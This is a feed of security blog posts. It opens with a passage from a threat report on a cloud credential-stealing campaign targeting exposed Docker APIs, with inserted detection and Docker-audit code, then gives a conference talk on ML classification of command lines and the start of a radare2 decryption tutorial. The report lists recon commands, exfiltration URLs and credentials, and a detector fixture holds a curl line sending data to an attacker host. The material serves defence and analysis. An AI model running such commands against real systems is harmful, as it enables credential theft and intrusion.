Additionally, the new version added the function get_prov_vars, which calls cat /proc/*/env* to collect environment variable details from each running process and writes the result to $CSOF. The actor likely does this to enumerate other valuable services running on the system for manual targeting.

We also observed profiling activity from Data.sh, a post-exploitation script that collects details from the system and sends them to the attacker’s server. The script uses Bash to craft a web request that downloads the curl binary from the attacker’s server through the bashload function. This is notable because attacks against minimal systems, such as containers, can be limited by the absence of ubiquitous binaries like curl.

The bashload function in Data.sh

The attacker sets variables for a lockfile and datafile in /var/tmp. The result of the following reconnaissance commands is written to the datafile:

| Command | Purpose |
|---|---|
| whoami | Current user |
| ls -al | Lists all files in the current directory |
| who | List of users with active terminal sessions |
| lastlog | Log of user login history |
| cat /var/spool/cron/* | Contents of configured cron jobs |
| ps aux | Details about all running processes |
| netstat -anop | Network connection and socket details |
| docker ps | List of Docker containers, including stopped containers |

The script then sends the results collected in the datafile to the C2 using curl with a provided username and password.
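The profiling sequence above is a detection opportunity. The following Python, an added example and not code from the report, runs two checks over constructed process-execution events: a burst of the Data.sh reconnaissance commands on one host within a short window, and curl authenticating with a -u username:password to an anondns.net host. The event line format, the window and the threshold are this example's own assumptions; the sample username, password and URL come from the data.sh row in the exfiltration table below.

```python
"""Detection logic for the Data.sh profiling sequence, run over constructed
process-execution events. Added example; not code from the report.

Signals taken from the report: (1) the burst of reconnaissance commands the
script writes to its datafile, and (2) curl authenticating with a hard-coded
username/password to an anondns.net host. Either alone is noisy; both on one
host within a short window is a strong indicator.
"""
import re
from collections import defaultdict
from datetime import datetime

# Reconnaissance commands listed in the report for Data.sh, as regexes matched
# against the start of the command line.
RECON_PATTERNS = {
    "whoami": r"^whoami\b",
    "ls": r"^ls\s+-al\b",
    "who": r"^who\b(?!ami)",
    "lastlog": r"^lastlog\b",
    "cron": r"^cat\s+/var/spool/cron/",
    "ps": r"^ps\s+aux\b",
    "netstat": r"^netstat\s+-anop\b",
    "docker": r"^docker\s+ps\b",
}
RECON_RE = {name: re.compile(p) for name, p in RECON_PATTERNS.items()}

# curl with -u user:pass (or --user) and a URL on anondns.net, the DDNS
# provider the report says the actor moved its infrastructure to.
CURL_EXFIL_RE = re.compile(
    r"^curl\b.*(?:\s-u\s*|\s--user\s+)\S+.*https?://[\w.-]*anondns\.net", re.I)


def parse_event(line):
    """Parse a constructed 'ISO-timestamp|host|user|cmdline' event line."""
    ts, host, user, cmd = line.rstrip("\n").split("|", 3)
    return datetime.fromisoformat(ts), host, user, cmd


def detect(lines, window_seconds=120, min_recon=4):
    """Return one alert dict per host that shows either signal."""
    recon_hits = defaultdict(list)   # host -> [(timestamp, command name)]
    exfil_hits = defaultdict(list)   # host -> [timestamp]
    for line in lines:
        ts, host, _user, cmd = parse_event(line)
        for name, rx in RECON_RE.items():
            if rx.search(cmd):
                recon_hits[host].append((ts, name))
        if CURL_EXFIL_RE.search(cmd):
            exfil_hits[host].append(ts)

    alerts = []
    for host in set(recon_hits) | set(exfil_hits):
        hits = sorted(recon_hits[host])
        # Sliding window: the largest set of distinct recon commands that
        # start within window_seconds of one another.
        best = set()
        for i, (t0, _) in enumerate(hits):
            names = {n for t, n in hits[i:]
                     if (t - t0).total_seconds() <= window_seconds}
            if len(names) > len(best):
                best = names
        burst = len(best) >= min_recon
        exfil = bool(exfil_hits[host])
        if burst or exfil:
            alerts.append({
                "host": host,
                "recon_commands": sorted(best),
                "recon_burst": burst,
                "curl_exfil": exfil,
                "severity": "high" if (burst and exfil) else "medium",
            })
    return sorted(alerts, key=lambda a: a["host"])


# Constructed sample events (not real telemetry). Host c1 shows the full
# Data.sh pattern; host web2 only runs ordinary, widely spaced commands.
SAMPLE_EVENTS = [
    "2023-06-20T10:00:00|c1|root|whoami",
    "2023-06-20T10:00:01|c1|root|ls -al",
    "2023-06-20T10:00:01|c1|root|who",
    "2023-06-20T10:00:02|c1|root|lastlog",
    "2023-06-20T10:00:02|c1|root|cat /var/spool/cron/root",
    "2023-06-20T10:00:03|c1|root|ps aux",
    "2023-06-20T10:00:03|c1|root|netstat -anop",
    "2023-06-20T10:00:04|c1|root|docker ps",
    "2023-06-20T10:00:09|c1|root|curl -u 8765:4321 --data-binary @/var/tmp/.data http://everlost.anondns.net/data.php",
    "2023-06-20T10:05:00|web2|app|ps aux",
    "2023-06-20T11:00:00|web2|app|whoami",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```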

Credentials Exfiltration

After collecting and processing the credentials, the credentials stealing scripts use curl to exfiltrate the contents of the $CSOF file to an AnonDNS-hosted server. The script contains hardcoded credentials that are used to authenticate the request. The June 2023 campaigns use the following username, password, and server URL combinations:

| SHA1 | Name | Username | Password | Exfil URL |
|---|---|---|---|---|
| 5611cb5676556410981eefab70d0e2aced01dbc5 | aws.sh | jegjrlgjhdsgjh | oeireopüigreigroei | http[:]//everlost.anondns.net/upload.php |
| 61da5d358df2e99ee174b22c4899dbbf903c76f0 | aws.sh (newer) | 1234 | 5678 | http[:]//silentbob.anondns.net/insert/keys.php |
| ac78d5c763e460db2137999b67b921e471a55e11 | g.aws.sh | 1234 | 5678 | http[:]//ap-northeast-1.compute.internal.anondns.net/insert/keys.php |
| dba0dcb8378d84abc8f7bf897825dd4f23e20e04 | data.sh | 8765 | 4321 | http[:]//everlost.anondns.net/data.php |

The send_data function from g.aws.sh

Propagation

In addition to the usual shell scripts, we observed the actor delivering a UPX-packed, Golang-based ELF binary. The binary ultimately drops and executes another shell script that scans an actor-specified range and attempts to propagate to vulnerable targets. We believe the actor used this binary to deliver yet another script because of the relatively noisy nature of the scanning activity. The scanner is hidden as an embedded base64 object within the packed Golang binary, adding more stealth than a standalone shell script. Additionally, the binary drops Zgrab, a Golang network scanning tool, which depends on Golang environment variables that are set by running the parent Go binary.

The implemented code enables the binary to read a command from a string and execute it using os_exec.

The main_main function

The main_main function decodes an embedded base64 blob, resulting in a Bash script that is written and then executed by the main_runCommand function. In the embedded script, the setupsomething function downloads the following packages on systems using the Yum package manager:

  • Compiler and code processing: gcc make git jq
  • Network utilities: libpcap libpcap-devel curl

This function also downloads the following packages on systems that use the Apt package manager:

  • Compiler and code processing: gcc make git jq
  • Network utilities: libpcap0.8 libpcap0.8-dev masscan curl

Next, setupsomething checks if masscan, docker, and zgrab are installed. If not, the script downloads the dependencies from the attacker’s server, hosted at the URI: /bin/[bin_name].

The dAPIpwn function takes the following arguments:

  • IP range: collected from the C2 server at /gr.php
  • Ports: 2375 and 2376, used for unencrypted and TLS-encrypted Docker API communications, respectively
  • Rate: 500,000 packets per second

The function passes these arguments to masscan, which scans the specified IP ranges then passes the results to zgrab, which looks for http responses from the remote endpoint /v1.16/version. The output is filtered using grep to search for lines containing the strings 'ApiVersion' or 'client version 1.16'. Aqua also detailed a step in the attack chain that looks for misconfigured Docker daemons running version 1.16. Interestingly, a Shodan search revealed only apparent honeypot systems responding with these strings on the specified ports.

When a system is deemed vulnerable, the script calls back to the C2 using curl with the vulnerable IP address and port added to the request URI.

Embedded script that scans for vulnerable Docker instances
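The scanner above only finds Docker daemons that answer on TCP 2375/2376 without client authentication, so the corresponding defender check is to audit your own daemon's listeners. The following Python is an added example, not code from the report or from Docker; it reads the daemon.json keys "hosts", "tls" and "tlsverify" and the dockerd -H/--host, --tls and --tlsverify flags (all real dockerd settings) and gives each tcp:// listener a verdict, with the weak configuration shown beside the corrected one. The verdict wording and the default-port handling are this example's own.

```python
"""Audit a Docker daemon's listeners for the exposure the report's scanner
probes: a TCP API endpoint on 2375/2376 that answers without client
authentication. Added example; not code from the report or from Docker.

Inputs are the daemon.json text and the dockerd command line. The keys
"hosts", "tls", "tlsverify" and the flags -H/--host, --tls, --tlsverify are
real dockerd settings; verdict wording is this example's own.
"""
import json
import re
import shlex

HOST_FLAG_RE = re.compile(r"^(?:-H|--host)(?:=(.+))?$")
DEFAULT_TCP_PORT = "2375"  # dockerd's default when a tcp:// host has no port
ANY_INTERFACE = {"", "0.0.0.0", "::", "[::]"}


def listeners_from_cmdline(cmdline):
    """Extract every -H/--host value from a dockerd command line."""
    hosts = []
    args = shlex.split(cmdline)
    i = 0
    while i < len(args):
        m = HOST_FLAG_RE.match(args[i])
        if m:
            if m.group(1) is not None:        # -H=value form
                hosts.append(m.group(1))
            elif i + 1 < len(args):           # -H value form
                i += 1
                hosts.append(args[i])
        i += 1
    return hosts


def split_tcp_host(host):
    """'tcp://0.0.0.0:2375' -> ('0.0.0.0', '2375'); no port -> default port."""
    addr = host[len("tcp://"):]
    bind, sep, port = addr.rpartition(":")
    if not sep or not port.isdigit():
        return addr, DEFAULT_TCP_PORT
    return bind, port


def audit_docker_daemon(daemon_json="{}", cmdline="dockerd"):
    """Return (listener, port, verdict) for each tcp:// listener configured
    in daemon.json or on the dockerd command line."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    flags = shlex.split(cmdline)
    hosts = list(cfg.get("hosts", [])) + listeners_from_cmdline(cmdline)
    tlsverify = bool(cfg.get("tlsverify")) or "--tlsverify" in flags
    tls = tlsverify or bool(cfg.get("tls")) or "--tls" in flags
    results = []
    for h in hosts:
        if not h.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are local-only
        bind, port = split_tcp_host(h)
        if tlsverify:
            verdict = "ok: TLS with client certificate verification"
        elif tls:
            verdict = "weak: TLS without client verification, any client can connect"
        else:
            verdict = "exposed: unauthenticated Docker API"
        if bind in ANY_INTERFACE and not tlsverify:
            verdict += "; bound to all interfaces"
        results.append((h, port, verdict))
    return results


if __name__ == "__main__":
    # Constructed configs: the weak setting beside the corrected one.
    weak = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
    fixed = ('{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"], '
             '"tlsverify": true, "tlscacert": "/etc/docker/ca.pem", '
             '"tlscert": "/etc/docker/server-cert.pem", '
             '"tlskey": "/etc/docker/server-key.pem"}')
    for label, cfg in (("weak", weak), ("fixed", fixed)):
        for listener, port, verdict in audit_docker_daemon(cfg):
            print(f"{label}: {listener} (port {port}) -> {verdict}")
```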

Conclusion

This campaign demonstrates the evolution of a seasoned cloud actor with familiarity across many technologies. The meticulous attention to detail indicates the actor has clearly experienced plenty of trial and error, shown in choices like serving the curl binary to systems that do not already have it. The actor has also improved the tool’s data formatting to enable more autonomous activity, which demonstrates a certain level of maturity and skill.

While AWS has long been in the crosshairs of many cloud-focused actors, the expansion to Azure and GCP credentials indicates there are other major contenders holding valuable data.

We believe this actor is actively tuning and improving their tools. Based on the tweaks observed across the past several weeks, the actor is likely preparing for larger scale campaigns. The lack of threats explicitly targeting Azure and GCP credentials up to this point means there are likely many fresh targets. The current focus on Docker is ultimately arbitrary: this actor has previously targeted other technologies and there are many other oft-forgotten vulnerable applications.

Organizations can prepare against these attacks by ensuring that applications are configured properly and patched as security fixes become available. Docker access should be restricted to suit your organization’s needs while reducing exposure from outside connections.

Indicators of Compromise


LABScon Replay | Quiver – Using Cutting Edge ML to Detect Interesting Command Lines for Hunters

By: LABScon
26 June 2023 at 13:16

What do GPT3, DALL-E2, and Copilot have in common? By grasping the structure and nature of language, these projects can generate text, images, and code that provide added value to a user.  Now, they even understand command lines!

Quiver – QUick Verifier for Threat HuntER – is an application aimed at understanding command lines and performing tasks like Attribution, Classification, Anomaly Detection, and many others.

DALL-E2 is known to take an input prompt in human language and draw a stunning image with impressive matching results; GPT3 and similar projects can create an infinite amount of text seemingly written by a real person, while Github’s Copilot can generate entire functions from a comment string.

Command lines are a language in themselves and can be taught and learned the same way other languages can. And the application can be as versatile as we want. Imagine giving a command line to an input prompt and getting the probability of it being a reverse shell, by an Iranian actor, or maybe used for cybercrime. A single prompt on its own may not help so much, but with the power of language models algorithms, the threat hunter can have millions of answers in a matter of minutes, shedding a light on the most important or urgent activities within the network.

In this session, Dean and Gal demonstrate how they developed such a model, along with real-world examples of how the model is used in applications like anomaly detection, attribution, and classification.

Quiver – Using Cutting Edge ML to detect interesting command lines for Hunters: Audio automatically transcribed by Sonix


Dean Langsam:
So first of all, I need to say that our code is in Jupyter Notebooks and PyTorch. So if any one of you want to see the code, just use wheels, exploits and we'll be good. Okay, so this is Quiver. I think I did. We did. Gal and I. Let's begin. Those three logos are logos for three fairly new tools, although they're pretty famous. The first one is DALL-E 2. The second one is GPT-3, and the third one is GitHub Copilot. And let's start with some examples.

Dean Langsam:
So DALL-E 2 can create an image from text. In that example, we can see a cybersecurity researcher sitting on a beanbag in front of a pool in the desert in a fancy hotel trying to reverse engineer a nation state malware, working on a presentation in a realistic style. So that's you guys. If you can connect with that one, maybe this is you guys. As you can see, it's not very good with text, but you are all cyber security researchers.

Dean Langsam:
GPT-3 is a model that can generate text. Its applications in cybersecurity. Don't really need to read that. What you need to know is that I've written only the gray part and GPT-3 created the rest.

Dean Langsam:
In the same manner, GitHub Copilot. I like, this is code that I actually use, just some authentication stuff. And when I've written that, I was just starting to use GitHub Copilot, and only the gray parts are the parts that I've actually typed in, and GitHub Copilot did the rest for me. You can see that even you have the function that, like, I made a typo, I called it anonymized password, and it understood that I mean to anonymize the password.

Dean Langsam:
Okay, so what's common to all those models? All those models understand language. They share language. Common language features between users or between applications. And part of the learning process is unsupervised, a term that we'll speak about later. The question is, can we do the same for the language of command lines? And the answer is yes, but well, no. So currently you're thinking like, what am I doing here? I came to a cybersecurity conference and we're here to talk about deep learning. Gal and I are not, firstly, cybersecurity people. We are coming from the field of machine learning and deep learning, and we try to get a free trip to Phoenix. So we managed to.

Dean Langsam:
We're going to talk about the problems we had with command lines before then. What changed that made this one possible. Then about our package Quiver, which as you've seen, the acronym came first. And eventually we'll show the big show of what we've got. This is Gal.

Gal Braun:
So I'm. Gal. Staff data scientist in SentinelOne for the last six years. A father of two. And Breaking Bad is the best show ever.

Dean Langsam:
And we are mostly the same person. I'm Dean. I'm a Staff data scientist in SentinelOne for three years, actually. Gal got me into the company. I'm a father of one, and Breaking Bad is the best show ever. Except maybe The Wire.

Dean Langsam:
So because we're not in a deep learning conference, let's do like a few minute intro to machine learning and deep learning. What you see here are cats and dogs, and those are called samples. We want to create an algorithm that can distinguish between cats and dogs.

Dean Langsam:
One way they try to do this before is like with algorithms that people are trying to generate. Maybe if it has like the ears are, the ears are that way and the tail is that way, maybe it's a cat, maybe it's a dog. And it was a very hard problem. Even a person couldn't tell you like, why the why am I seeing a cat or a dog in this picture? I just like when you know, you know.

Dean Langsam:
So we try to make this in deep learning. We just show the the computer, the algorithm, many examples of cats and dogs. This is called tagging or labeling. And you can go into Google and just type like give me pictures of dogs. Those would be the green ones and then give me pictures of cats. Those will be the red ones. And then you show the algorithm enough samples and it will create an algorithm using what we call training.

Dean Langsam:
Then when you give it a new sample, the gray one, you, you, you don't tell the algorithm which one it is, which one it is, and you put it in the algorithm and the algorithm spits out, well, this is a cat in the same fashion. It says, This is a dog. Now, that was a pretty easy problem because you could search that on Google, like, give me cats, give me dogs. Enough people tagged cats and dogs in the history of time.

Dean Langsam:
Um, but as my friend John Naisbitt, I know he's not actually my friend, but he's a very famous person. He told "We are drowning in information, but we are starved for knowledge". Like all of us have a lot of stuff, like pictures of things, command lines, language, many things. So what we have, we have many command lines in SentinelOne. The thing we don't have is tag data or label data. The people that can actually do tagging for label data like saying is this command line bad or good or bad? The green ones are good. The red ones are bad. Most of the people that can actually label the data for us are in the in this room.

Dean Langsam:
So I could ask you guys, instead of listening to the talk, give me ten minutes of your time and start tagging data for me. But that is very manual process and that would not scale up.

Dean Langsam:
So what changed? Well, in the old time, meet Mimi. Mimi Katz. She's. She's Jewish like us. And she has a task. Separate, like she gets many papers and we tell her separate those papers between, like, stuff about cyber security and stuff about machine learning. Even if she doesn't know, like, the two concepts, maybe she can try to distinguish between the two. The problem is that the papers are in Hebrew and she doesn't know Hebrew, so she could maybe try and do so. If you give her like thousands of examples, maybe she can try and understand the hieroglyphs of Hebrew and try to understand which hieroglyphs are machine learning and which hieroglyphs are cybersecurity. But that that would again not scale up.

So instead we can introduce a baby. This is Wanna, or WannaCry. Wanna also doesn't speak Hebrew. He doesn't speak any language. He's a baby. But what he does have is time, because he's a baby and people are speaking Hebrew and English next to him all the time. Where does it meet us? Well, this is the old way.

Dean Langsam:
We used to do things like the first one is task one. Give the student a task to distinguish between two things, then give another student its task to distinguish between two other things. A baby can do something else. We can try and give it books like first, understand language, understand what's Hebrew, understand the relationships between words. Just understand the language. Then when you give them tasks, we can give them a lot less data to learn on the tasks instead of like giving it like the whole history of data for each different task. And you're probably starting to understand where we're going with this.

Dean Langsam:
This is again a Quiver and what quiver understands it can do is that Quiver is the baby. We have again in SentinelOne. We don't have a lot of labeled data about command lines, but we have a lot of command lines. So we can just ask Quiver, well, start reading those command lines and start to understand the language of command lines. Of course, this is not as very simple. We have many command line languages and stuff like that, but basically you can just tell it like start reading command lines.

Dean Langsam:
Um, the way we do this is by, I think we call the masked language model. And basically we give it like a sentence and then we hide one of the words or a few of the words and then we can try it like tell it based on that sentence with the hidden word, try to predict that word. That's the way the model learns. This is how we create like, we virtually create labeled data for the task of learning the language.

Dean Langsam:
Ah, now, now, when we learn the language, we can deploy it into different tasks such as like, classify, classify between different executables. We can do anomaly detection. We can of course try to do distinguish between malicious and benign command lines and so on and so forth.

Dean Langsam:
That's, of course, like we have a saying in the data community that given infinite time and infinite data, the model, will learn everything, but unfortunately we don't have infinite time or data. So we try to help our models. In our specific case, we try to take the command line wisdom and deploy some regex rules on it. So you can see that we are trying to mask different directory paths. We try, we, we, we can understand when we are seeing a local IP or a public IP, we can see when we have base64 strings and all those kinds of rules that we've created to help our model.

Gal Braun:
So given that we have this data set of command lines that we pre-processed and we want to feed it to the model, and now eventually, as we mentioned before, the model receives numbers, it needs somehow to translate these strings into vector of numbers that it can can process. So the building blocks of language, which is in our domain called tokens. Let's see how we can extract them.

Gal Braun:
So there are several approaches and the main one will be to dissect these strings into words by using several separators like slashes or whitespaces, which is great if you want to keep the high level entities. For example, argument names, you see that the argument name is still intact, but it makes our lives a little bit difficult when we want when we tackle new strings. For example, if we see a new command line with a new argument name, we need to handle it somehow because we don't see it in our vocabulary.

Gal Braun:
So a different approach will be just to split the whole command line into single characters and single chunks, which is the minimum amount. So it mitigates the issue of unknown data that we tackle. But it makes it more difficult to understand the higher level entities. And it will take the model a lot more time to learn.

Gal Braun:
So there is the middle ground, some cool concept that was popped up several years ago which called Subwords. And I won't get in too much into details how it's happening, but it allows us to dissect the text into generic blocks.

Gal Braun:
You can see these double hashtags in some of the tokens, which mean it's an end of a word or a start of a word. And it gives us the good parts of both worlds.

Gal Braun:
So the good output, some things we can extract with these models, is feeding them text, for example a single token or a whole command line, and we can extract some vector of numbers that we can use for different tasks. And actually, as mentioned before, we are taking these command lines, feeding them to a model which learns the general semantics about the command lines, and then fine tune it to specific tasks. And during this learning phase it's optimizing some – it's called weights, some numbers inside of this model which will be different for each kind of task, so we can extract command line representations based on specific tasks that we are interested in.

Gal Braun:
Okay. This was an intro about the core concepts of this model and how it works. And let's see some examples of the output of the results that we got. So here's a nice blob. And we took millions of command lines and fed it to some model and let it just learn the semantics of command lines. Each one of these dots that you see here is a single token from the text that that the model extracted.

Gal Braun:
Now we can take a take a look inside of these tokens and see if it understands some semantics about the command lines. Each each one of the dots is a vector and this is a two dimensionality reduction of the results. So for example, here you can see a minus no profile token, which is a known PowerShell argument. On the left side, you can see it's a zoom in to the specific space location of minus, no profile inside of these tokens representations. And as you can see on the right, you can see that no profile and a token and the green ones are the ones that was mathematically the closest one to it. And on the right and the small table is the five, the most the five most closest tokens to the specific token.

Gal Braun:
As you can see, the top three, which was the closest ones, are different PowerShell arguments or syntax, which is awesome because it really understands something about tokens from PowerShell, PowerShell command lines and the bottom two is not related straight straight to PowerShell, but it's a different arguments. For example, the second from the bottom is a Java argument which again symbolizes that it learns something about arguments to executables, which is nice.

Gal Braun:
A second example regarding that is a different token, which is double hashtag dot VBS quotes, which means the end of a file path inside of an argument value. And as you can see in a similar way, you can see that the top three ones are different VBS tokens, but the rest of them are in the exactly in the same patterns but with different file extensions.

Gal Braun:
So it's dot js, dot bat, PL, JAR and so on. And it really understand that these patterns, these tokens are related inside the same space and give it similar vector numbers and which eventually led us to the conclusion, okay, we have something, it's not totally random and, and we can try and take this model and fine tune it to some task that we want.

Gal Braun:
So the most obvious thing that we can think about was trying to teach the model whether a specific command line is malicious or benign. And what we did is, okay, so we have this baseline language model that learned the general semantics, but we want to fine tune it to this specific task. So firstly, we need some labels. SentinelOne has an MDR service called Vigilance, which basically goes through different cases, different threats that are happening on our customers' computers, and decides if a specific case is malicious or benign. And we use these cases to try and decide and extract some command lines that we know would be malicious and vice versa.

Gal Braun:
So here you can see PowerShell command line from a specific malicious threat that was happening and the model actually signed it as malicious, which is cool. But these kind of models let you extract something even more, even more fruitful. You can. Try and extract for each one of the tokens how much it supported to the to the decision if a command line was malicious or benign.

Gal Braun:
So, for example, you can see here the different parts that led the model to decide this classification. For example, here you can see the Invoke-WebRequest inside of this PowerShell, and some parts of the URL caused it to think this command line is malicious.

Gal Braun:
In a similar way, here are another two examples. The middle one is another malicious PowerShell command line that the model decided was malicious, and you can see the areas it is focusing on, like for example the NonInteractive token or, it's a little bit faded, but the sleep function at the end of the PowerShell command line, which it learned from the data that we fed it is malicious and might cause it to be a malicious command line.

Gal Braun:
And the third example is an entirely benign command line. It's just a winword.exe executable that was given some file path. And the model thinks it's very, very... sorry, I didn't explain that the red parts are saying it's more malicious and the green ones led it to think it's more benign. And you see that the fact that winword is the name of the executable, and some string parts in the file name, caused it to think it's a benign command line.

Gal Braun:
And so what can we do with this model besides just predicting on a single command line? So firstly, we can just take this model, even if it's not 100% accurate, and throw every command line from a customer environment through it. It might have mistakes, but it can help us as hunters, for example, find our blind spots and reduce all the areas that we might miss, because there are a bunch of threats, a lot of information just going through our customers' environments.

Gal Braun:
And we have to focus somehow. So this tool can help hunters to focus on the areas that they might be missing. And from another aspect, these kinds of explanations, to understand what causes these command lines to be more malicious or more benign, can help us understand our customers' information and draw conclusions. And even, for example, we can try and write a YARA rule that specifically fits these kinds of patterns that we see on malicious command lines or, for example, command lines that the model usually thinks are more malicious.

Gal Braun:
So this was one example. And the second one that we wanted to talk about was executable classification. What we did is take our millions of command lines and split them into arguments and executable. And we fine-tuned the model to try, given a set of arguments, to tell me which executable it is.

Gal Braun:
So another piece of art on the right side. Each one of these dots is another dimensionality reduction of an argument, a set of arguments. And the color is the executable. And as you can see, this representation is actually very, very good. Most of the clusters are very uniform, which means it actually learns something about which arguments are relevant to which executable. And even more interestingly, there are clusters that are not uniform, which make us think, what are these clusters and what are these interesting command lines that look like different executables?

Gal Braun:
So here, just to have some a little bit more practical examples. You can see some of the clusters of main executables, like CMD or VPC, and actually a cool byproduct you can see at the top: three different browsers that arose in different clusters but were around the same area in this n-dimensional space. But you can try and extract some cool information from these clusters, for example some intent. Here, for example, is a cluster that was based mostly on communication executables, or here you can see a cluster where most of the arguments inside were Java arguments and one cmd. And if you print this cmd command line, it was actually execution of Java, which actually makes sense. But this tool can be used to try and tag and understand the intent of a specific command line without even looking at it. You can use this model to see a new command line that fell inside one of these clusters and try to predict, okay, this cmd.exe, it did something that we know is maybe executing Java.

Gal Braun:
And the last example here: you can see this big giant cluster is full of different PDF readers. And on the bottom you can see two examples of CMD and MSEDGE that also opened PDF files, which again means we can understand these clusters, these representations in this cluster, and we can tag them with some nice intent and try and predict for a specific command line.

Gal Braun:
So I'm sure that there is at least one person in this audience that thinks they can solve this thing with regex, sit and try and write sophisticated patterns. But the awesome part of this model is you just feed it a boatload of data. You don't need to really fine-tune it specifically for the task that you want. And as was mentioned, I think it was on the first day, there are more and more attack vectors for third-party executables, and this thing, if you keep feeding it more and more data, it will understand better the semantics of command lines and can easily be fine-tuned to the task that we want. And if the results won't be good, we still have a saved spot in art school. And that's it. Thank you. Any questions?

Speaker3:
Yeah. Have you found any, like, openly available databases, systems with tons and tons of points relevant to this community that we could use for our own play on machine learning?

Gal Braun:
Do you mean, like, given these representations that were created, whether we found something that we can publish to the community for them to use?

More like, say I don't have the entire database of SentinelOne data to work against, but I do want something to put it against as a threat researcher. Is there anything, any direction you would push me?

Dean Langsam:
Yeah. So this is currently only the research phase, but the same way you can use DALL-E 2 although you're not an artist (probably; we've never met), you're not an artist, you're not a poet, but you can use GPT-3 and you can use DALL-E 2. Once we have a working model, it should understand even new stuff that is in that domain. So even if you give it a new command line, if we trained it well, it could say the things that we've taught it to say. In that way, if we prove it successful and actually good, then yeah, of course we can do it.

Dean Langsam:
And one of the things that is fairly new in our world is that DALL-E 2 is one specific implementation of a bigger academic paper that's called CLIP. And basically the most special thing that DALL-E 2 had is the data itself. But it gives you the data. Now if you say, I have more data, I can start from that model. The model itself is open source. You can start from that model and train it on your own. It would probably take you a lot of time, you need many GPUs, but it's available to you. It's just a question of time and money and not proprietary stuff and things like that. Yeah. So.

Gal Braun:
So it depends. It depends what exactly you want to achieve. Because overfitting sounds like the worst nightmare for every data scientist, but it might be good for you if you specifically want to find abnormal activity in a specific customer, if you want the model to be fine-tuned for a specific customer and extract information. It depends on the application. But yes, exactly.

I think one of the reasons we thought about, for example, normalizing paths or local IPs or base64, it was to ease the training. But also, let's not fine-tune into a specific IP or specific directory names. So the road is still long before you get to something very mature that we can publish publicly. But yes, it's something that needs to be thought about, and beyond that, PII, for example: let's not give some attacker the option to type "my IP is" something and it will complete it to some DNS server or whatever, something that's important to the customer. But yeah. Things to think about. Yeah.

Dean Langsam:
Uh, we're not product people. So once we show it to the PMs, if they like it... like, as shown, the part with the green and red parts is very cool to us. Will customers find it useful? That's not on us, I think. I think it will be cool to show it, but again, the PMs will decide.

Thank you, guys.


About the Presenters

Gal Braun is a data scientist at SentinelOne, working on Data Science & Machine learning focused on explainability, representation learning, and visualizations.

Dean Langsam is a data scientist at SentinelOne, working on the intersection of data science, machine learning, deep learning, language models, Python scientific programming, data visualizations, and Bayesian modeling.

About LABScon

This presentation was featured live at LABScon 2022, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.


Automating String Decryption and Other Reverse Engineering Tasks in radare2 With r2pipe

21 June 2023 at 13:52

In the previous post in this series, we looked at powering up radare2 with aliases and macros to make our work more productive, but sometimes we need the ability to automate more complex tasks, extend our analyses by bringing in other tools, or process files in batches. Most reverse engineering platforms have some kind of scripting engine to help achieve this kind of heavy lifting and radare2 does, too. In this post, we’ll learn how to drive radare2 with r2pipe and tackle three different challenges that are common to RE automation: decrypting strings, applying comments, and processing files in batches.

Scripting radare2 with C, Go, Swift, Perl, Python, Ruby…

No matter what language you’re most comfortable working in, there’s a good chance that r2pipe supports it. There are 22 supported languages, though they are not all supported equally.

Programming languages supported by radare2’s r2pipe

C, NodeJS, Python and Swift are the best-supported languages, but I tend to use Go for speed and brevity, and it lets me hack scripts together rather haphazardly to achieve what I need. When scripting your own reversing sessions, there’s little need to worry about the niceties of programming style or convention as we would when shipping code for production or other purposes. Although performance can be improved by doing things in one language rather than another, that’s something I rarely need to worry about in practice in my reversing work.

All that’s a preamble to saying that you can – and probably should! – write better scripts than those I’ll show here, but these examples will serve as a good introduction to how you can easily hack your way around problems thanks to r2’s shell integration to get a working solution without worrying too much about “the right” or “the best” way to do it.

Automated String Decryption in OSX.Fairytale

We’ll use a sample of OSX.Fairytale to illustrate automated string decryption. Though I’ll be using Go, you can easily apply the same techniques in whatever other language you prefer.

Like many simple malware families, Fairytale encrypts strings with a combination of base64 and a hard coded XOR key. In this case, the XOR key is 0x30.

OSX.Fairytale uses 0x30 as a hard coded key for XOR decryption

Once we have determined the XOR key, there are various simple ways to decrypt a given string or even the whole binary (e.g., CyberChef, or writing your own decryption function), but our eventual aim is to add comments to the disassembly (as well as learn a few useful tricks), so we’ll take a different approach.

Note that radare2 comes with a useful little tool called rahash2 which, among other things, can decrypt strings. Here’s an example you can run on the command line (the trailing % is just zsh indicating that the output has no final newline):

% rahash2 -D base64 -s 'H1JZXh9cUUVeU1hTRFw=' | rahash2 -D xor -S 0x30 -
/bin/launchctl%

As we discussed in the previous post, we could easily make this into a function in our .zshrc file. However, one drawback with that approach is that r2 won’t let us call such functions from the r2 prompt. We can solve that by creating a standalone executable and saving it in our path, like so:

#!/bin/zsh
# rxorb: XOR-decrypt a string with rahash2, optionally base64-decoding it first.
if [ "$#" -eq 2 ]; then
	# rxorb <key> <string>
	echo "$(rahash2 -D xor -S "$1" -s "$2")"
elif [ "$#" -eq 3 ] && [ "$1" = "-b" ]; then
	# rxorb -b <key> <base64 string>
	echo "$(rahash2 -D base64 -s "$3" | rahash2 -D xor -S "$2" -)"
elif [ "$#" -eq 1 ]; then
	# quoted heredoc: nothing inside is expanded, so the quotes in the
	# examples no longer break the string
	cat <<'USAGE'
# USAGE:
# rxorb <key> <string>
# rxorb 0x30 "\|YRBQBI"
# Use '-b' to base64 decode the string before the xor
# rxorb -b 0x30 FXAffFlSQlFCSR98UUVeU1hxV1VeREMfFXAeQFxZQ0Q=
USAGE
else
	echo "INPUT ERROR, type 'rxorb help' for help."
fi

Saving this as /usr/local/bin/rxorb and giving it executable permissions (e.g., via chmod +x) will make it available to us both on the command line and from within r2, once we open a new shell and a new r2 session.

Calling rxorb from within r2 to decrypt individual strings

Great, we now have a general string decryption tool that we can feed a key and a cipher text, and we are able to specify whether the cipher text needs to be base64 decoded before being XOR’d with the given key. This alone will take care of a lot of use cases!

However, while this works well for manual decryption, it becomes tedious for anything more than a few strings. What would be much better is if we could simply type one command that would iterate over encrypted strings in the binary and either print out all the decrypted text or comment the code where the string is referenced. Ideally, our solution should give us the option to do both.

Let’s see how we can implement that by leveraging radare2’s scripting engine, r2pipe (aka r2p).

Building the Script

